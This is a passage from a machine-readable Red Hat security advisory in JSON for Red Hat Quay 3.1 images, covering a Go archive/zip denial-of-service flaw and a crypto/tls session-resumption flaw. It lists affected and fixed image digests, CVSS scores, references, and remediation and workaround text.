"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "During session resumption in crypto/tls, if the underlying Config has its ClientCAs or RootCAs fields mutated between the initial handshake and the resumed handshake, the resumed handshake may succeed when it should have failed. This may happen when a user calls Config.Clone and mutates the returned Config, or uses Config.GetConfigForClient. This can cause a client to resume a session with a server that it would not have resumed with during the initial handshake, or cause a server to resume a session with a client that it would not have resumed with during the initial handshake.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: Unexpected session resumption in crypto/tls",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
